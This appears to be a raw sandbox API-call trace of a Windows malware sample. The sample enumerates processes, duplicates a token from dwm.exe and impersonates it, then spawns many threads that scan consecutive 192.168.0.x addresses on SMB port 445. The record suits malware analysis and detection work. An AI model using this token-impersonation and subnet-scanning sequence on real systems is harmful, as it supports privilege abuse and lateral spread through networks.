OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.953] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.953] CloseHandle (hObject=0x53c) returned 1 [0096.953] CloseHandle (hObject=0x538) returned 1 [0096.953] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.955] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1cc) returned 0x538 [0096.955] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.955] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.955] CloseHandle (hObject=0x53c) returned 1 [0096.955] CloseHandle (hObject=0x538) returned 1 [0096.955] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x16c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.956] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d4) returned 0x538 [0096.956] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.957] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.957] CloseHandle (hObject=0x53c) returned 1 [0096.957] CloseHandle (hObject=0x538) returned 1 [0096.957] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.958] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x244) returned 0x538 [0096.958] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x0) returned 0 [0096.958] CloseHandle (hObject=0x538) returned 1 [0096.958] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.960] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x288) returned 0x538 [0096.960] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x0) returned 0 [0096.960] CloseHandle (hObject=0x538) returned 1 [0096.960] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.961] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2bc) returned 0x538 [0096.961] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x0) returned 0 [0096.961] CloseHandle (hObject=0x538) returned 1 [0096.961] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.963] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x538 [0096.963] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.963] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.963] CloseHandle (hObject=0x53c) returned 1 [0096.963] CloseHandle (hObject=0x538) returned 1 [0096.963] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.964] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x538 [0096.964] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.964] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.964] CloseHandle (hObject=0x53c) returned 1 [0096.964] CloseHandle (hObject=0x538) returned 1 [0096.965] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.966] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f0) returned 0x538 [0096.966] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x0) returned 0 [0096.966] CloseHandle (hObject=0x538) returned 1 [0096.966] Process32NextW (in: hSnapshot=0x534, lppe=0x5b3fcb0 | out: lppe=0x5b3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.967] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x368) returned 0x538 [0096.967] OpenProcessToken (in: ProcessHandle=0x538, DesiredAccess=0xa, TokenHandle=0x5b3ff2c | out: TokenHandle=0x5b3ff2c*=0x53c) returned 1 [0096.967] GetTokenInformation (in: TokenHandle=0x53c, TokenInformationClass=0xa, TokenInformation=0x5b3fee0, TokenInformationLength=0x38, ReturnLength=0x5b3ff1c | out: TokenInformation=0x5b3fee0, ReturnLength=0x5b3ff1c) returned 1 [0096.968] DuplicateToken (in: ExistingTokenHandle=0x53c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x5b3ff28 | out: DuplicateTokenHandle=0x5b3ff28*=0x540) returned 1 [0096.968] SetThreadToken (Thread=0x0, Token=0x540) returned 1 [0096.968] CloseHandle (hObject=0x540) returned 1 [0096.968] CloseHandle (hObject=0x53c) returned 1 [0096.968] CloseHandle (hObject=0x538) returned 1 [0096.968] CloseHandle (hObject=0x534) returned 1 Thread: id = 54 os_tid = 0x8f8 [0097.285] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac958 [0097.285] free (_Block=0x20ac958) [0097.285] inet_addr (cp="192.168.0.231") returned 0xe700a8c0 [0097.285] htons (hostshort=0x1bd) returned 0xbd01 [0097.285] socket (af=2, type=1, protocol=6) returned 0x7b4 [0097.329] ioctlsocket (in: s=0x7b4, cmd=-2147195266, argp=0x5c7ff44 | out: argp=0x5c7ff44) returned 0 [0097.329] connect (s=0x7b4, name=0x5c7ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.231"), namelen=16) returned -1 [0097.329] WSAGetLastError () returned 10035 [0097.329] select (nfds=0, readfds=0x0, writefds=0x5c7fd18, exceptfds=0x5c7fe20, timeout=0x5c7ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 55 os_tid = 0x904 [0097.285] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac930 [0097.285] free (_Block=0x20ac930) [0097.285] inet_addr (cp="192.168.0.230") returned 0xe600a8c0 [0097.285] htons (hostshort=0x1bd) returned 0xbd01 [0097.286] socket (af=2, type=1, protocol=6) returned 0x7b8 [0097.330] ioctlsocket (in: s=0x7b8, cmd=-2147195266, argp=0x5dbff44 | out: argp=0x5dbff44) returned 0 [0097.330] connect (s=0x7b8, name=0x5dbff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.230"), namelen=16) returned -1 [0097.330] WSAGetLastError () returned 10035 [0097.330] select (nfds=0, readfds=0x0, writefds=0x5dbfd18, exceptfds=0x5dbfe20, timeout=0x5dbff3c*(tv_sec=10, tv_usec=0)) Thread: id = 56 os_tid = 0x8fc [0097.286] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac908 [0097.286] free (_Block=0x20ac908) [0097.286] inet_addr (cp="192.168.0.229") returned 0xe500a8c0 [0097.286] htons (hostshort=0x1bd) returned 0xbd01 [0097.286] socket (af=2, type=1, protocol=6) returned 0x7bc [0097.330] ioctlsocket (in: s=0x7bc, cmd=-2147195266, argp=0x5efff44 | out: argp=0x5efff44) returned 0 [0097.330] connect (s=0x7bc, name=0x5efff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.229"), namelen=16) returned -1 [0097.331] WSAGetLastError () returned 10035 [0097.331] select (nfds=0, readfds=0x0, writefds=0x5effd18, exceptfds=0x5effe20, timeout=0x5efff3c*(tv_sec=10, tv_usec=0)) Thread: id = 57 os_tid = 0x8e0 [0097.286] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac8e0 [0097.286] free (_Block=0x20ac8e0) [0097.286] inet_addr (cp="192.168.0.228") returned 0xe400a8c0 [0097.286] htons (hostshort=0x1bd) returned 0xbd01 [0097.286] socket (af=2, type=1, protocol=6) returned 0x7c0 [0097.331] ioctlsocket (in: s=0x7c0, cmd=-2147195266, argp=0x603ff44 | out: argp=0x603ff44) returned 0 [0097.331] connect (s=0x7c0, name=0x603ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.228"), namelen=16) returned -1 [0097.332] WSAGetLastError () returned 10035 [0097.332] select (nfds=0, readfds=0x0, writefds=0x603fd18, exceptfds=0x603fe20, timeout=0x603ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 58 os_tid = 0xca4 [0097.286] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac8b8 [0097.286] free (_Block=0x20ac8b8) [0097.287] inet_addr (cp="192.168.0.227") returned 0xe300a8c0 [0097.287] htons (hostshort=0x1bd) returned 0xbd01 [0097.287] socket (af=2, type=1, protocol=6) returned 0x7c4 [0097.332] ioctlsocket (in: s=0x7c4, cmd=-2147195266, argp=0x617ff44 | out: argp=0x617ff44) returned 0 [0097.332] connect (s=0x7c4, name=0x617ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.227"), namelen=16) returned -1 [0097.333] WSAGetLastError () returned 10035 [0097.333] select (nfds=0, readfds=0x0, writefds=0x617fd18, exceptfds=0x617fe20, timeout=0x617ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 59 os_tid = 0xd48 [0097.287] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac890 [0097.287] free (_Block=0x20ac890) [0097.287] inet_addr (cp="192.168.0.226") returned 0xe200a8c0 [0097.287] htons (hostshort=0x1bd) returned 0xbd01 [0097.287] socket (af=2, type=1, protocol=6) returned 0x7c8 [0097.333] ioctlsocket (in: s=0x7c8, cmd=-2147195266, argp=0x62bff44 | out: argp=0x62bff44) returned 0 [0097.333] connect (s=0x7c8, name=0x62bff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.226"), namelen=16) returned -1 [0097.334] WSAGetLastError () returned 10035 [0097.334] select (nfds=0, readfds=0x0, writefds=0x62bfd18, exceptfds=0x62bfe20, timeout=0x62bff3c*(tv_sec=10, tv_usec=0)) Thread: id = 60 os_tid = 0xca0 [0097.287] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac868 [0097.287] free (_Block=0x20ac868) [0097.287] inet_addr (cp="192.168.0.225") returned 0xe100a8c0 [0097.287] htons (hostshort=0x1bd) returned 0xbd01 [0097.287] socket (af=2, type=1, protocol=6) returned 0x7cc [0097.334] ioctlsocket (in: s=0x7cc, cmd=-2147195266, argp=0x63fff44 | out: argp=0x63fff44) returned 0 [0097.334] connect (s=0x7cc, name=0x63fff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.225"), namelen=16) returned -1 [0097.334] WSAGetLastError () returned 10035 [0097.335] select (nfds=0, readfds=0x0, writefds=0x63ffd18, exceptfds=0x63ffe20, timeout=0x63fff3c*(tv_sec=10, tv_usec=0)) Thread: id = 61 os_tid = 0xc94 [0097.287] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac840 [0097.288] free (_Block=0x20ac840) [0097.288] inet_addr (cp="192.168.0.224") returned 0xe000a8c0 [0097.288] htons (hostshort=0x1bd) returned 0xbd01 [0097.288] socket (af=2, type=1, protocol=6) returned 0x7d0 [0097.335] ioctlsocket (in: s=0x7d0, cmd=-2147195266, argp=0x653ff44 | out: argp=0x653ff44) returned 0 [0097.335] connect (s=0x7d0, name=0x653ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.224"), namelen=16) returned -1 [0097.335] WSAGetLastError () returned 10035 [0097.335] select (nfds=0, readfds=0x0, writefds=0x653fd18, exceptfds=0x653fe20, timeout=0x653ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 62 os_tid = 0xc98 [0097.288] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac818 [0097.288] free (_Block=0x20ac818) [0097.288] inet_addr (cp="192.168.0.223") returned 0xdf00a8c0 [0097.288] htons (hostshort=0x1bd) returned 0xbd01 [0097.288] socket (af=2, type=1, protocol=6) returned 0x7d4 [0097.336] ioctlsocket (in: s=0x7d4, cmd=-2147195266, argp=0x667ff44 | out: argp=0x667ff44) returned 0 [0097.336] connect (s=0x7d4, name=0x667ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.223"), namelen=16) returned -1 [0097.337] WSAGetLastError () returned 10035 [0097.337] select (nfds=0, readfds=0x0, writefds=0x667fd18, exceptfds=0x667fe20, timeout=0x667ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 63 os_tid = 0xc9c [0097.288] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac7f0 [0097.288] free (_Block=0x20ac7f0) [0097.288] inet_addr (cp="192.168.0.222") returned 0xde00a8c0 [0097.288] htons (hostshort=0x1bd) returned 0xbd01 [0097.288] socket (af=2, type=1, protocol=6) returned 0x7d8 [0097.337] ioctlsocket (in: s=0x7d8, cmd=-2147195266, argp=0x67bff44 | out: argp=0x67bff44) returned 0 [0097.337] connect (s=0x7d8, name=0x67bff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.222"), namelen=16) returned -1 [0097.338] WSAGetLastError () returned 10035 [0097.338] select (nfds=0, readfds=0x0, writefds=0x67bfd18, exceptfds=0x67bfe20, timeout=0x67bff3c*(tv_sec=10, tv_usec=0)) Thread: id = 64 os_tid = 0xd00 [0097.289] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac7c8 [0097.289] free (_Block=0x20ac7c8) [0097.289] inet_addr (cp="192.168.0.221") returned 0xdd00a8c0 [0097.289] htons (hostshort=0x1bd) returned 0xbd01 [0097.289] socket (af=2, type=1, protocol=6) returned 0x7dc [0097.338] ioctlsocket (in: s=0x7dc, cmd=-2147195266, argp=0x68fff44 | out: argp=0x68fff44) returned 0 [0097.338] connect (s=0x7dc, name=0x68fff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.221"), namelen=16) returned -1 [0097.339] WSAGetLastError () returned 10035 [0097.339] select (nfds=0, readfds=0x0, writefds=0x68ffd18, exceptfds=0x68ffe20, timeout=0x68fff3c*(tv_sec=10, tv_usec=0)) Thread: id = 65 os_tid = 0x8b8 [0097.289] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac7a0 [0097.289] free (_Block=0x20ac7a0) [0097.289] inet_addr (cp="192.168.0.220") returned 0xdc00a8c0 [0097.289] htons (hostshort=0x1bd) returned 0xbd01 [0097.289] socket (af=2, type=1, protocol=6) returned 0x7e0 [0097.339] ioctlsocket (in: s=0x7e0, cmd=-2147195266, argp=0x6a3ff44 | out: argp=0x6a3ff44) returned 0 [0097.339] connect (s=0x7e0, name=0x6a3ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.220"), namelen=16) returned -1 [0097.339] WSAGetLastError () returned 10035 [0097.339] select (nfds=0, readfds=0x0, writefds=0x6a3fd18, exceptfds=0x6a3fe20, timeout=0x6a3ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 66 os_tid = 0x444 [0097.289] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac778 [0097.289] free (_Block=0x20ac778) [0097.289] inet_addr (cp="192.168.0.219") returned 0xdb00a8c0 [0097.290] htons (hostshort=0x1bd) returned 0xbd01 [0097.290] socket (af=2, type=1, protocol=6) returned 0x7e4 [0097.340] ioctlsocket (in: s=0x7e4, cmd=-2147195266, argp=0x6b7ff44 | out: argp=0x6b7ff44) returned 0 [0097.340] connect (s=0x7e4, name=0x6b7ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.219"), namelen=16) returned -1 [0097.340] WSAGetLastError () returned 10035 [0097.340] select (nfds=0, readfds=0x0, writefds=0x6b7fd18, exceptfds=0x6b7fe20, timeout=0x6b7ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 67 os_tid = 0x8c8 [0097.290] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac750 [0097.290] free (_Block=0x20ac750) [0097.290] inet_addr (cp="192.168.0.218") returned 0xda00a8c0 [0097.290] htons (hostshort=0x1bd) returned 0xbd01 [0097.290] socket (af=2, type=1, protocol=6) returned 0x7e8 [0097.341] ioctlsocket (in: s=0x7e8, cmd=-2147195266, argp=0x6cbff44 | out: argp=0x6cbff44) returned 0 [0097.341] connect (s=0x7e8, name=0x6cbff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.218"), namelen=16) returned -1 [0097.341] WSAGetLastError () returned 10035 [0097.341] select (nfds=0, readfds=0x0, writefds=0x6cbfd18, exceptfds=0x6cbfe20, timeout=0x6cbff3c*(tv_sec=10, tv_usec=0)) Thread: id = 68 os_tid = 0xd4c [0097.290] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac728 [0097.290] free (_Block=0x20ac728) [0097.290] inet_addr (cp="192.168.0.217") returned 0xd900a8c0 [0097.290] htons (hostshort=0x1bd) returned 0xbd01 [0097.290] socket (af=2, type=1, protocol=6) returned 0x7ec [0097.341] ioctlsocket (in: s=0x7ec, cmd=-2147195266, argp=0x6dfff44 | out: argp=0x6dfff44) returned 0 [0097.341] connect (s=0x7ec, name=0x6dfff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.217"), namelen=16) returned -1 [0097.342] WSAGetLastError () returned 10035 [0097.342] select (nfds=0, readfds=0x0, writefds=0x6dffd18, exceptfds=0x6dffe20, timeout=0x6dfff3c*(tv_sec=10, tv_usec=0)) Thread: id = 69 os_tid = 0xd40 [0097.291] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac700 [0097.291] free (_Block=0x20ac700) [0097.291] inet_addr (cp="192.168.0.216") returned 0xd800a8c0 [0097.291] htons (hostshort=0x1bd) returned 0xbd01 [0097.291] socket (af=2, type=1, protocol=6) returned 0x7f0 [0097.342] ioctlsocket (in: s=0x7f0, cmd=-2147195266, argp=0x6f3ff44 | out: argp=0x6f3ff44) returned 0 [0097.342] connect (s=0x7f0, name=0x6f3ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.216"), namelen=16) returned -1 [0097.343] WSAGetLastError () returned 10035 [0097.343] select (nfds=0, readfds=0x0, writefds=0x6f3fd18, exceptfds=0x6f3fe20, timeout=0x6f3ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 70 os_tid = 0xd3c [0097.291] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac2a0 [0097.291] free (_Block=0x20ac2a0) [0097.291] inet_addr (cp="192.168.0.215") returned 0xd700a8c0 [0097.291] htons (hostshort=0x1bd) returned 0xbd01 [0097.291] socket (af=2, type=1, protocol=6) returned 0x7f4 [0097.343] ioctlsocket (in: s=0x7f4, cmd=-2147195266, argp=0x707ff44 | out: argp=0x707ff44) returned 0 [0097.343] connect (s=0x7f4, name=0x707ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.215"), namelen=16) returned -1 [0097.344] WSAGetLastError () returned 10035 [0097.344] select (nfds=0, readfds=0x0, writefds=0x707fd18, exceptfds=0x707fe20, timeout=0x707ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 71 os_tid = 0xd38 [0097.292] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac278 [0097.292] free (_Block=0x20ac278) [0097.292] inet_addr (cp="192.168.0.214") returned 0xd600a8c0 [0097.292] htons (hostshort=0x1bd) returned 0xbd01 [0097.292] socket (af=2, type=1, protocol=6) returned 0x7f8 [0097.344] ioctlsocket (in: s=0x7f8, cmd=-2147195266, argp=0x71bff44 | out: argp=0x71bff44) returned 0 [0097.344] connect (s=0x7f8, name=0x71bff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.214"), namelen=16) returned -1 [0097.345] WSAGetLastError () returned 10035 [0097.345] select (nfds=0, readfds=0x0, writefds=0x71bfd18, exceptfds=0x71bfe20, timeout=0x71bff3c*(tv_sec=10, tv_usec=0)) Thread: id = 72 os_tid = 0xd6c [0097.292] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac250 [0097.292] free (_Block=0x20ac250) [0097.292] inet_addr (cp="192.168.0.213") returned 0xd500a8c0 [0097.292] htons (hostshort=0x1bd) returned 0xbd01 [0097.292] socket (af=2, type=1, protocol=6) returned 0x7fc [0097.345] ioctlsocket (in: s=0x7fc, cmd=-2147195266, argp=0x72fff44 | out: argp=0x72fff44) returned 0 [0097.345] connect (s=0x7fc, name=0x72fff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.213"), namelen=16) returned -1 [0097.346] WSAGetLastError () returned 10035 [0097.346] select (nfds=0, readfds=0x0, writefds=0x72ffd18, exceptfds=0x72ffe20, timeout=0x72fff3c*(tv_sec=10, tv_usec=0)) Thread: id = 73 os_tid = 0xd74 [0097.292] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac228 [0097.292] free (_Block=0x20ac228) [0097.292] inet_addr (cp="192.168.0.212") returned 0xd400a8c0 [0097.292] htons (hostshort=0x1bd) returned 0xbd01 [0097.292] socket (af=2, type=1, protocol=6) returned 0x804 [0097.346] ioctlsocket (in: s=0x804, cmd=-2147195266, argp=0x743ff44 | out: argp=0x743ff44) returned 0 [0097.346] connect (s=0x804, name=0x743ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.212"), namelen=16) returned -1 [0097.347] WSAGetLastError () returned 10035 [0097.347] select (nfds=0, readfds=0x0, writefds=0x743fd18, exceptfds=0x743fe20, timeout=0x743ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 74 os_tid = 0xd78 [0097.293] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac200 [0097.293] free (_Block=0x20ac200) [0097.293] inet_addr (cp="192.168.0.211") returned 0xd300a8c0 [0097.293] htons (hostshort=0x1bd) returned 0xbd01 [0097.293] socket (af=2, type=1, protocol=6) returned 0x808 [0097.347] ioctlsocket (in: s=0x808, cmd=-2147195266, argp=0x757ff44 | out: argp=0x757ff44) returned 0 [0097.347] connect (s=0x808, name=0x757ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.211"), namelen=16) returned -1 [0097.348] WSAGetLastError () returned 10035 [0097.348] select (nfds=0, readfds=0x0, writefds=0x757fd18, exceptfds=0x757fe20, timeout=0x757ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 75 os_tid = 0xd70 [0097.293] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac1d8 [0097.293] free (_Block=0x20ac1d8) [0097.293] inet_addr (cp="192.168.0.210") returned 0xd200a8c0 [0097.293] htons (hostshort=0x1bd) returned 0xbd01 [0097.293] socket (af=2, type=1, protocol=6) returned 0x80c [0097.348] ioctlsocket (in: s=0x80c, cmd=-2147195266, argp=0x76bff44 | out: argp=0x76bff44) returned 0 [0097.348] connect (s=0x80c, name=0x76bff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.210"), namelen=16) returned -1 [0097.349] WSAGetLastError () returned 10035 [0097.349] select (nfds=0, readfds=0x0, writefds=0x76bfd18, exceptfds=0x76bfe20, timeout=0x76bff3c*(tv_sec=10, tv_usec=0)) Thread: id = 76 os_tid = 0xd68 [0097.294] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac1b0 [0097.294] free (_Block=0x20ac1b0) [0097.294] inet_addr (cp="192.168.0.209") returned 0xd100a8c0 [0097.294] htons (hostshort=0x1bd) returned 0xbd01 [0097.294] socket (af=2, type=1, protocol=6) returned 0x810 [0097.349] ioctlsocket (in: s=0x810, cmd=-2147195266, argp=0x77fff44 | out: argp=0x77fff44) returned 0 [0097.349] connect (s=0x810, name=0x77fff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.209"), namelen=16) returned -1 [0097.350] WSAGetLastError () returned 10035 [0097.350] select (nfds=0, readfds=0x0, writefds=0x77ffd18, exceptfds=0x77ffe20, timeout=0x77fff3c*(tv_sec=10, tv_usec=0)) Thread: id = 77 os_tid = 0xd64 [0097.294] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac188 [0097.294] free (_Block=0x20ac188) [0097.294] inet_addr (cp="192.168.0.208") returned 0xd000a8c0 [0097.294] htons (hostshort=0x1bd) returned 0xbd01 [0097.294] socket (af=2, type=1, protocol=6) returned 0x814 [0097.350] ioctlsocket (in: s=0x814, cmd=-2147195266, argp=0x793ff44 | out: argp=0x793ff44) returned 0 [0097.350] connect (s=0x814, name=0x793ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.208"), namelen=16) returned -1 [0097.350] WSAGetLastError () returned 10035 [0097.350] select (nfds=0, readfds=0x0, writefds=0x793fd18, exceptfds=0x793fe20, timeout=0x793ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 78 os_tid = 0xd60 [0097.296] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20ac160 [0097.296] free (_Block=0x20ac160) [0097.296] inet_addr (cp="192.168.0.207") returned 0xcf00a8c0 [0097.296] htons (hostshort=0x1bd) returned 0xbd01 [0097.296] socket (af=2, type=1, protocol=6) returned 0x818 